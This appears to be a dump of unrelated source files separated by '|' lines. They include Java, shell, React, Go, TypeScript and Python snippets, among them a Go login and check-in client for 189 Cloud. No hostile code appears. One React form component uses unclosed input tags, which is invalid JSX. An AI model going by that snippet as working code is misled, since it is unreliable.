     * @param vpnPorts the iterable collection of vpnPorts
     * @return true if all given vpnPorts were updated successfully
     */
    boolean updatePorts(Iterable<VpnPort> vpnPorts);

    /**
     * Deletes the vpnPorts with the given identifiers.
     *
     * @param vpnPortIds the iterable collection of vpnPort identifiers
     * @return true if every identified vpnPort was deleted successfully
     */
    boolean removePorts(Iterable<VpnPortId> vpnPortIds);

    /**
     * Processes gluon config for vpn port information.
     *
     * @param action can be either update or delete
     * @param key    can contain the id and also target information
     * @param value  content of the vpn port configuration
     */
    void processGluonConfig(String action, String key, JsonNode value);

    /**
     * Adds the specified listener to the Vpn Port manager.
     *
     * @param listener Vpn Port listener
     */
    void addListener(VpnPortListener listener);

    /**
     * Removes the specified listener from the Vpn Port manager.
     *
     * @param listener Vpn Port listener
     */
    void removeListener(VpnPortListener listener);
}
|
#!/bin/bash
# Run swiftlint over one named source group; the "templates_generated"
# group is pre-processed to re-enable linting of generated files.

PROJECT_DIR="${PROJECT_DIR:-`cd "$(dirname $0)/..";pwd`}"
SWIFTLINT="${PROJECT_DIR}/.build/swiftlint/swiftlint"
CONFIG="${PROJECT_DIR}/.swiftlint.yml"

# On CI, emit annotations GitHub Actions understands.
if [ $CI ]; then
    REPORTER="--reporter github-actions-logging"
else
    REPORTER=
fi

# possible paths
paths_swiftgen_sources="Sources/SwiftGen"
paths_swiftgen_tests="Tests/SwiftGenTests"
paths_swiftgencli_sources="Sources/SwiftGenCLI"
paths_swiftgenkit_sources="Sources/SwiftGenKit"
paths_swiftgenkit_tests="Tests/SwiftGenKitTests"
paths_templates_tests="Tests/TemplatesTests"
paths_templates_generated="Sources/TestUtils/Fixtures/Generated"
paths_testutils_sources="Sources/TestUtils"

# load selected group (first CLI argument selects a paths_* variable)
if [ $# -gt 0 ]; then
    key="$1"
else
    echo "error: need group to lint."
    exit 1
fi
selected_path=`eval echo '$'paths_$key`
if [ -z "$selected_path" ]; then
    echo "error: need a valid group to lint."
    exit 1
fi

# temporary work directory (removed on exit)
scratch=`mktemp -d -t SwiftGen`
function finish {
    rm -rf "$scratch"
}
trap finish EXIT

# actually run swiftlint
if [ "$key" = "templates_generated" ]; then
    # copy the generated output to a temp dir and strip the "swiftlint:disable:all"
    for f in `find "${PROJECT_DIR}/${selected_path}" -name '*.swift'`; do
        temp_file="${scratch}${f#"$PROJECT_DIR"}"
        mkdir -p $(dirname "$temp_file")
        sed "s/swiftlint:disable all/ --/" "$f" > "$temp_file"
    done
    # Map scratch paths back to real paths in the report; propagate
    # swiftlint's own exit status through the pipeline.
    "$SWIFTLINT" lint --strict --config "$CONFIG" --path "$scratch" $REPORTER | sed s@"$scratch"@"${PROJECT_DIR}"@
    exit ${PIPESTATUS[0]}
else
    "$SWIFTLINT" lint --strict --config "$CONFIG" --path "${PROJECT_DIR}/${selected_path}" $REPORTER
fi
|
#!/bin/bash
# Verify workbench is installed editable, wait for a service at $1:$2
# (timeout $3 seconds), then run the docker test suite.
set -e
echo "Testing if workbench is installed in editable mode"
ls /opt/conda/lib/python3.7/site-packages/workbench.egg-link
./wait-for-it.sh $1:$2 -t $3 -- \
echo "Running pytest as $USER with uid $UID" && \
pytest -vv "$(pwd)/docker"
|
import React from 'react';
const FormComponent = () => (
<form>
<label>
First name:
<input type="text" name="firstName">
</label>
<label>
Last name:
<input type="text" name="lastName">
</label>
<label>
Email:
<input type="email" name="email">
</label>
<input type="submit" value="Submit">
</form>
);
export default FormComponent; |
#!/bin/bash
# See docs/release-payload.md for more information
# Environment definitions sourced by the release tooling.

# A namespace and imagestream where the release will be published to
RELEASE_NAMESPACE=kni
RELEASE_STREAM=release

# A kubeconfig for api.ci.openshift.org
RELEASE_KUBECONFIG=release-kubeconfig

# Need access to wherever the payload image - and the
# images referenced by the payload - are hosted
RELEASE_PULLSECRET=release-pullsecret

# The imagestream in $RELEASE_NAMESPACE where kni-installer will be
# published to
INSTALLER_STREAM=installer

# The git repository and ref (e.g. branch) to build kni-installer from
INSTALLER_GIT_URI=https://github.com/openshift-metalkube/kni-installer.git
INSTALLER_GIT_REF=master
|
import React from "react";
import { Container, Button } from "shards-react";
import opnidashboard from '../images/p1.png'

// Static quick-start page: intro text, a launch button and a dashboard
// screenshot. The Button has no onClick handler wired up here.
const QuickStart = () => (
  <Container fluid className="main-content-container px-4 pb-4">
    <div className="error">
      <div className="error__content">
        <h2>Opni Demo Quickstart</h2>
        <h3>Launch our demo with sockshop application on a single node cluster</h3>
        <Button pill>Launch Demo</Button>
        <p> </p>
        <img src={opnidashboard} alt="Opni Dashboard" width="960" height="540" />
      </div>
    </div>
  </Container>
);

export default QuickStart;
//require module
//
const TCA9548A = require('./tca9548a');

//module is constructed via Class so first call a new instance
//device is automatically initialized and ready to use
//addr defaults to 0x70 and bus defaults to 1
//
const tca9548a_1 = new TCA9548A({addr: 0x70, bus: 1});

//if you have more than one TCA9548A, can call another instance
//make sure that the addr is correct!!!
//
const tca9548a_2 = new TCA9548A({addr: 0x71, bus: 1});

//as an example, if using two bme280 temp sensors (sensor1 and sensor2) that have the same address
//need to enable the specific multiplexer port each time you want to read from a certain device
//singlePortOn activates the port number of the argument and disables the other ports
//argument has to be a number 0-7
//
//use a callback to ensure that the port is enabled before proceeding with other processing
//
//for example, sensor1 is attached to port 2 on the multiplexer
//
//Bug fix: pass the function REFERENCE as the callback. The original wrote
//doSomethingWithSensor(), which invoked it immediately (before the port
//was enabled) and handed its undefined return value to singlePortOn.
tca9548a_1.singlePortOn(2, doSomethingWithSensor);

//then you want to read from sensor2 attached to port 6 on the multiplexer
//
tca9548a_1.singlePortOn(6, doSomethingWithSensor);

function doSomethingWithSensor () {
  //process sensor data magic
  console.log('doSomethingWithSensor called');
}

//can also enable all ports
tca9548a_1.allPortsOn();

//or disable all ports
tca9548a_1.allPortsOff();
|
package cloud189
import (
"crypto/rand"
"crypto/rsa"
"crypto/x509"
"encoding/hex"
"encoding/pem"
"fmt"
"log"
"regexp"
"strconv"
"time"
"github.com/buger/jsonparser"
"github.com/go-resty/resty/v2"
)
// sign performs the daily check-in request against the 189 cloud marketing
// API and returns the bonus space (in MB) reported by the server, or 0 on
// any request/parse error.
func sign(client *resty.Client) int {
	// Millisecond timestamp used as a cache-busting "rand" query parameter.
	// Named ts rather than rand so it does not shadow the imported
	// crypto/rand package (the original shadowed it).
	ts := strconv.FormatInt(time.Now().UnixNano()/1e6, 10)
	url := "https://api.cloud.189.cn/mkt/userSign.action?rand=" + ts + "&clientType=TELEANDROID&version=8.6.3&model=SM-G930K"
	headers := map[string]string{
		"Referer":         "https://m.cloud.189.cn/zhuanti/2016/sign/index.jsp?albumBackupOpened=1",
		"Host":            "m.cloud.189.cn",
		"Accept-Encoding": "gzip, deflate",
	}
	resp, err := client.R().SetHeaders(headers).Get(url)
	if err != nil {
		log.Println(err)
		return 0
	}
	// The response JSON carries the granted quota under "netdiskBonus".
	netdiskBonus, err := jsonparser.GetInt(resp.Body(), "netdiskBonus")
	if err != nil {
		log.Println(err)
		return 0
	}
	return int(netdiskBonus)
}
// login performs the two-step web login for cloud.189.cn: it scrapes the
// login page for the dynamic parameters (captchaToken, lt, returnUrl,
// paramId, RSA public key), submits RSA-encrypted credentials to the OAuth
// endpoint, and follows the returned redirect URL so the session cookies
// are established on client. Returns true on success.
func login(client *resty.Client, username, password string) bool {
	url := "https://cloud.189.cn/udb/udb_login.jsp?pageId=1&redirectURL=/main.action"
	resp, err := client.R().Get(url)
	if err != nil {
		log.Println(err)
		return false
	}
	ctx := resp.String()
	// Scrape the per-session tokens embedded in the login page markup.
	captchaToken := regexpString(`captchaToken' value='(.+?)'`, ctx)
	lt := regexpString(`var lt = "(.+?)";`, ctx)
	returnUrl := regexpString(`returnUrl = '(.+?)',`, ctx)
	paramId := regexpString(`var paramId = "(.+?)";`, ctx)
	jRsaKey := regexpString(`id="j_rsaKey" value="(.+?)"`, ctx)
	// The page provides only the base64 body; wrap it into a PEM block for
	// rsaEncrypt.
	key := "-----BEGIN PUBLIC KEY-----\n" + jRsaKey + "\n-----END PUBLIC KEY-----"
	url = "https://open.e.189.cn/api/logbox/oauth2/loginSubmit.do"
	headers := map[string]string{
		"lt":         lt,
		"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/76.0",
		"Referer":    "https://open.e.189.cn/",
	}
	data := map[string]string{
		"appKey":       "cloud",
		"accountType":  "01",
		"userName":     "{RSA}" + rsaEncrypt(username, key),
		"password":     "{RSA}" + rsaEncrypt(password, key),
		"validateCode": "",
		"captchaToken": captchaToken,
		"returnUrl":    returnUrl,
		"mailSuffix":   "@189.cn",
		"paramId":      paramId,
		"dynamicCheck": "FALSE",
		"clientType":   "10010",
		"cb_SaveName":  "1",
		"isOauth2":     "false",
	}
	resp, err = client.R().SetHeaders(headers).SetFormData(data).Post(url)
	if err != nil {
		log.Println(err)
		return false
	}
	msg, err := jsonparser.GetString(resp.Body(), "msg")
	// BUG FIX: the original used `err != nil && msg != "登录成功"`, which let a
	// well-formed failure response (err == nil but msg reporting failure)
	// fall through as success. Either condition alone means login failed.
	if err != nil || msg != "登录成功" {
		log.Println(err, msg)
		return false
	}
	url, err = jsonparser.GetString(resp.Body(), "toUrl")
	if err != nil {
		log.Println(err)
		return false
	}
	// Follow the redirect to finish establishing the session cookies.
	client.R().Get(url)
	return true
}
// Do 执行 — logs in to the 189 cloud with the given credentials and performs
// the daily sign-in, returning a human-readable result message.
func Do(username, password string) string {
	client := resty.New()
	// Present an Android Ecloud client so the mobile endpoints accept us.
	client.SetHeaders(map[string]string{
		"User-Agent": "Mozilla/5.0 (Linux; Android 5.1.1; SM-G930K Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36 Ecloud/8.6.3 Android/22 clientId/355325117317828 clientModel/SM-G930K imsi/460071114317824 clientChannelId/qq proVersion/1.0.6",
	})
	if ok := login(client, username, password); !ok {
		return "登录失败"
	}
	// 签到
	return fmt.Sprintf("本次签到获得%dM空间", sign(client))
}
// regexpString compiles reg, matches it against ctx, and returns the first
// capture group. It returns "" when the pattern does not match or does not
// yield exactly one capture group.
func regexpString(reg, ctx string) string {
	m := regexp.MustCompile(reg).FindStringSubmatch(ctx)
	if len(m) == 2 {
		return m[1]
	}
	return ""
}
// rsaEncrypt 公钥加密 — encrypts in with the PEM-encoded RSA public key using
// PKCS#1 v1.5 padding and returns the ciphertext as a hex string.
// Returns "" if the key fails to decode/parse or encryption fails.
func rsaEncrypt(in, key string) string {
	// Strip the PEM wrapper; a nil block means the input was not valid PEM.
	block, _ := pem.Decode([]byte(key))
	if block == nil {
		return ""
	}
	// Parse the DER bytes as a PKIX (SubjectPublicKeyInfo) public key.
	parsed, err := x509.ParsePKIXPublicKey(block.Bytes)
	if err != nil {
		log.Println(err)
		return ""
	}
	// Unchecked type assertion, as in the original — NOTE(review): this
	// panics if the server ever supplies a non-RSA key; confirm upstream.
	rsaKey := parsed.(*rsa.PublicKey)
	ciphertext, err := rsa.EncryptPKCS1v15(rand.Reader, rsaKey, []byte(in))
	if err != nil {
		log.Println(err)
		return ""
	}
	return hex.EncodeToString(ciphertext)
}
|
<reponame>lettucebowler/stencildoku<filename>src/components.d.ts
/* eslint-disable */
/* tslint:disable */
/**
* This is an autogenerated file created by the Stencil compiler.
* It contains typing information for all components that exist in this project.
*/
import { HTMLStencilElement, JSXBase } from "@stencil/core/internal";
/**
 * Public prop typings: one interface per Stencil component, with the
 * component's @Prop() fields as required members.
 * Autogenerated by the Stencil compiler — regenerate rather than hand-edit.
 */
export namespace Components {
    // Application shell; exposes no props.
    interface AppRoot {
    }
    // Props for <lettuce-button>.
    interface LettuceButton {
        "fluid": boolean;
        "newGame": boolean;
        // NOTE(review): `string | 'sm' | 'md' | 'lg'` collapses to plain
        // `string`, so the literal union adds no extra type checking here.
        "sizeSelection": string | 'sm' | 'md' | 'lg';
        "square": boolean;
        "text": string;
        "type": string;
    }
    interface LettuceModal {
    }
    interface LettucePageContentContainer {
    }
    interface LettuceSpacingVertical {
        "sizeSelection": string;
    }
    // Props for <lettuce-sudoku-board>; board contents are passed as strings.
    interface LettuceSudokuBoard {
        "currentBoard": string;
        "initialBoard": string;
        "order": number;
        "selectedCol": number;
        "selectedRow": number;
    }
    // Props for a single <lettuce-sudoku-cell>.
    interface LettuceSudokuCell {
        "col": number;
        "number": number;
        "numberStatus": string;
        "row": number;
        "selectionState": string;
        "type": string;
    }
    interface LettuceSudokuGame {
        "order": number;
    }
    interface LettuceSudokuMoveButtons {
        "order": number;
    }
}
/**
 * Global registrations: an HTMLElement subtype plus a constructor object for
 * each custom element, and the tag-name → element-type entries used by DOM
 * APIs such as document.createElement().
 * Autogenerated by the Stencil compiler — regenerate rather than hand-edit.
 */
declare global {
    interface HTMLAppRootElement extends Components.AppRoot, HTMLStencilElement {
    }
    var HTMLAppRootElement: {
        prototype: HTMLAppRootElement;
        new (): HTMLAppRootElement;
    };
    interface HTMLLettuceButtonElement extends Components.LettuceButton, HTMLStencilElement {
    }
    var HTMLLettuceButtonElement: {
        prototype: HTMLLettuceButtonElement;
        new (): HTMLLettuceButtonElement;
    };
    interface HTMLLettuceModalElement extends Components.LettuceModal, HTMLStencilElement {
    }
    var HTMLLettuceModalElement: {
        prototype: HTMLLettuceModalElement;
        new (): HTMLLettuceModalElement;
    };
    interface HTMLLettucePageContentContainerElement extends Components.LettucePageContentContainer, HTMLStencilElement {
    }
    var HTMLLettucePageContentContainerElement: {
        prototype: HTMLLettucePageContentContainerElement;
        new (): HTMLLettucePageContentContainerElement;
    };
    interface HTMLLettuceSpacingVerticalElement extends Components.LettuceSpacingVertical, HTMLStencilElement {
    }
    var HTMLLettuceSpacingVerticalElement: {
        prototype: HTMLLettuceSpacingVerticalElement;
        new (): HTMLLettuceSpacingVerticalElement;
    };
    interface HTMLLettuceSudokuBoardElement extends Components.LettuceSudokuBoard, HTMLStencilElement {
    }
    var HTMLLettuceSudokuBoardElement: {
        prototype: HTMLLettuceSudokuBoardElement;
        new (): HTMLLettuceSudokuBoardElement;
    };
    interface HTMLLettuceSudokuCellElement extends Components.LettuceSudokuCell, HTMLStencilElement {
    }
    var HTMLLettuceSudokuCellElement: {
        prototype: HTMLLettuceSudokuCellElement;
        new (): HTMLLettuceSudokuCellElement;
    };
    interface HTMLLettuceSudokuGameElement extends Components.LettuceSudokuGame, HTMLStencilElement {
    }
    var HTMLLettuceSudokuGameElement: {
        prototype: HTMLLettuceSudokuGameElement;
        new (): HTMLLettuceSudokuGameElement;
    };
    interface HTMLLettuceSudokuMoveButtonsElement extends Components.LettuceSudokuMoveButtons, HTMLStencilElement {
    }
    var HTMLLettuceSudokuMoveButtonsElement: {
        prototype: HTMLLettuceSudokuMoveButtonsElement;
        new (): HTMLLettuceSudokuMoveButtonsElement;
    };
    // Tag-name lookup map consumed by typed DOM creation/query APIs.
    interface HTMLElementTagNameMap {
        "app-root": HTMLAppRootElement;
        "lettuce-button": HTMLLettuceButtonElement;
        "lettuce-modal": HTMLLettuceModalElement;
        "lettuce-page-content-container": HTMLLettucePageContentContainerElement;
        "lettuce-spacing-vertical": HTMLLettuceSpacingVerticalElement;
        "lettuce-sudoku-board": HTMLLettuceSudokuBoardElement;
        "lettuce-sudoku-cell": HTMLLettuceSudokuCellElement;
        "lettuce-sudoku-game": HTMLLettuceSudokuGameElement;
        "lettuce-sudoku-move-buttons": HTMLLettuceSudokuMoveButtonsElement;
    }
}
/**
 * JSX-facing prop typings. Unlike Components, every prop here is optional,
 * and custom-event handler props (onGenerateBoard, onCellSelected,
 * onMoveEvent, onNewGameEvent) are included for use in TSX templates.
 * Autogenerated by the Stencil compiler — regenerate rather than hand-edit.
 */
declare namespace LocalJSX {
    interface AppRoot {
    }
    interface LettuceButton {
        "fluid"?: boolean;
        "newGame"?: boolean;
        "sizeSelection"?: string | 'sm' | 'md' | 'lg';
        "square"?: boolean;
        "text"?: string;
        "type"?: string;
    }
    interface LettuceModal {
        // Fired by the modal to request generation of a new board.
        "onGenerateBoard"?: (event: CustomEvent<string>) => void;
    }
    interface LettucePageContentContainer {
    }
    interface LettuceSpacingVertical {
        "sizeSelection"?: string;
    }
    interface LettuceSudokuBoard {
        "currentBoard"?: string;
        "initialBoard"?: string;
        "order"?: number;
        "selectedCol"?: number;
        "selectedRow"?: number;
    }
    interface LettuceSudokuCell {
        "col"?: number;
        "number"?: number;
        "numberStatus"?: string;
        "onCellSelected"?: (event: CustomEvent<any>) => void;
        "row"?: number;
        "selectionState"?: string;
        "type"?: string;
    }
    interface LettuceSudokuGame {
        "onMoveEvent"?: (event: CustomEvent<any>) => void;
        "onNewGameEvent"?: (event: CustomEvent<any>) => void;
        "order"?: number;
    }
    interface LettuceSudokuMoveButtons {
        "onMoveEvent"?: (event: CustomEvent<any>) => void;
        "order"?: number;
    }
    interface IntrinsicElements {
        "app-root": AppRoot;
        "lettuce-button": LettuceButton;
        "lettuce-modal": LettuceModal;
        "lettuce-page-content-container": LettucePageContentContainer;
        "lettuce-spacing-vertical": LettuceSpacingVertical;
        "lettuce-sudoku-board": LettuceSudokuBoard;
        "lettuce-sudoku-cell": LettuceSudokuCell;
        "lettuce-sudoku-game": LettuceSudokuGame;
        "lettuce-sudoku-move-buttons": LettuceSudokuMoveButtons;
    }
}
export { LocalJSX as JSX };
/**
 * Module augmentation: merges each custom-element tag into @stencil/core's
 * JSX.IntrinsicElements (with standard HTML attributes) so the tags
 * type-check inside TSX render functions.
 * Autogenerated by the Stencil compiler — regenerate rather than hand-edit.
 */
declare module "@stencil/core" {
    export namespace JSX {
        interface IntrinsicElements {
            "app-root": LocalJSX.AppRoot & JSXBase.HTMLAttributes<HTMLAppRootElement>;
            "lettuce-button": LocalJSX.LettuceButton & JSXBase.HTMLAttributes<HTMLLettuceButtonElement>;
            "lettuce-modal": LocalJSX.LettuceModal & JSXBase.HTMLAttributes<HTMLLettuceModalElement>;
            "lettuce-page-content-container": LocalJSX.LettucePageContentContainer & JSXBase.HTMLAttributes<HTMLLettucePageContentContainerElement>;
            "lettuce-spacing-vertical": LocalJSX.LettuceSpacingVertical & JSXBase.HTMLAttributes<HTMLLettuceSpacingVerticalElement>;
            "lettuce-sudoku-board": LocalJSX.LettuceSudokuBoard & JSXBase.HTMLAttributes<HTMLLettuceSudokuBoardElement>;
            "lettuce-sudoku-cell": LocalJSX.LettuceSudokuCell & JSXBase.HTMLAttributes<HTMLLettuceSudokuCellElement>;
            "lettuce-sudoku-game": LocalJSX.LettuceSudokuGame & JSXBase.HTMLAttributes<HTMLLettuceSudokuGameElement>;
            "lettuce-sudoku-move-buttons": LocalJSX.LettuceSudokuMoveButtons & JSXBase.HTMLAttributes<HTMLLettuceSudokuMoveButtonsElement>;
        }
    }
}
|
package cn.ben.tvdemo.util;
import java.text.ParseException;
import java.text.SimpleDateFormat;
import java.util.Calendar;
import java.util.Date;
import java.util.Locale;
/**
 * Static date/time helpers built on {@link SimpleDateFormat} and
 * {@link Calendar}.
 *
 * FIX: the original kept a single shared static Calendar that every method
 * mutated — not thread-safe, and state leaked between calls. Each method
 * now uses its own local Calendar instance.
 */
@SuppressWarnings("SameParameterValue")
public class TimeUtil {
    public static final String FORMAT_YEAR_MONTH_DAY = "yyyy-MM-dd";
    public static final String FORMAT_YEAR_MONTH_DAY_HOUR_MINUTE = "yyyy-MM-dd HH:mm";

    private TimeUtil() {
        // Static utility class; no instances.
    }

    /**
     * Parses {@code date} with {@code inputFormat}, adds {@code inc} days
     * (may be negative), and formats the result with {@code outputFormat}.
     *
     * @throws IllegalArgumentException if {@code date} cannot be parsed
     *         (the original would instead throw an opaque NullPointerException
     *         from {@code setTime(null)})
     */
    public static String plusOnDate(String date, int inc, String inputFormat, String outputFormat) {
        Date parsed = string2Date(date, inputFormat);
        if (parsed == null) {
            throw new IllegalArgumentException("Unparseable date: " + date);
        }
        Calendar calendar = Calendar.getInstance();
        calendar.setTime(parsed);
        calendar.add(Calendar.DATE, inc);
        return date2String(calendar.getTime(), outputFormat);
    }

    /**
     * Adds {@code inc} days to the current time and formats the result with
     * {@code outputFormat}.
     */
    public static String plusOnCurrentDate(int inc, String outputFormat) {
        return date2String(plusOnCurrentDate(inc), outputFormat);
    }

    /** Adds {@code inc} days to the current time and returns the Date. */
    public static Date plusOnCurrentDate(int inc) {
        Calendar calendar = Calendar.getInstance();
        calendar.setTime(new Date());
        calendar.add(Calendar.DATE, inc);
        return calendar.getTime();
    }

    /** Formats {@code date} using {@code format} in the default locale. */
    public static String date2String(Date date, String format) {
        return new SimpleDateFormat(format, Locale.getDefault()).format(date);
    }

    /**
     * Parses {@code dateStr} using {@code format} in the default locale.
     *
     * @return the parsed Date, or {@code null} if parsing fails (the
     *         exception is printed, matching the original contract)
     */
    public static Date string2Date(String dateStr, String format) {
        SimpleDateFormat sdf = new SimpleDateFormat(format, Locale.getDefault());
        try {
            return sdf.parse(dateStr);
        } catch (ParseException e) {
            e.printStackTrace();
        }
        return null;
    }

    /** Returns true when both dates fall on the same calendar day. */
    public static boolean areSameDay(Date dateA, Date dateB) {
        Calendar calDateA = Calendar.getInstance();
        calDateA.setTime(dateA);
        Calendar calDateB = Calendar.getInstance();
        calDateB.setTime(dateB);
        return calDateA.get(Calendar.YEAR) == calDateB.get(Calendar.YEAR)
                && calDateA.get(Calendar.MONTH) == calDateB.get(Calendar.MONTH)
                && calDateA.get(Calendar.DAY_OF_MONTH) == calDateB.get(Calendar.DAY_OF_MONTH);
    }
}
|
from typing import List
def transform_list(nums: List[int]) -> List[int]:
    """Apply one Collatz-style step to every integer in ``nums``.

    Even values are halved (floor division); odd values become ``3*n + 1``.
    Returns a new list; the input is not modified.
    """
    return [n // 2 if n % 2 == 0 else 3 * n + 1 for n in nums]
# Smoke test: exercise transform_list on a small sample and print the result.
input_list = [1, 2, 3, 4, 5]
output_list = transform_list(input_list)
print(output_list)  # Output: [4, 1, 10, 2, 16]
<reponame>Subliminal-Panda/bookstore-frontend
import React, { useEffect } from 'react';
import { useRoutes } from 'hookrouter';
import NavBar from './navigation/navBar';
import routes from './navigation/routes';
export default function App() {
const routeResult = useRoutes(routes);
// const removeUserCookies = () => {
// window.onunload = () => {
// Cookies.remove('username');
// }
// };
// useEffect (() => {
// console.log(Cookies.get('username'));
// removeUserCookies();
// });
return (
<div className='app'>
<NavBar />
{routeResult}
</div>
);
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.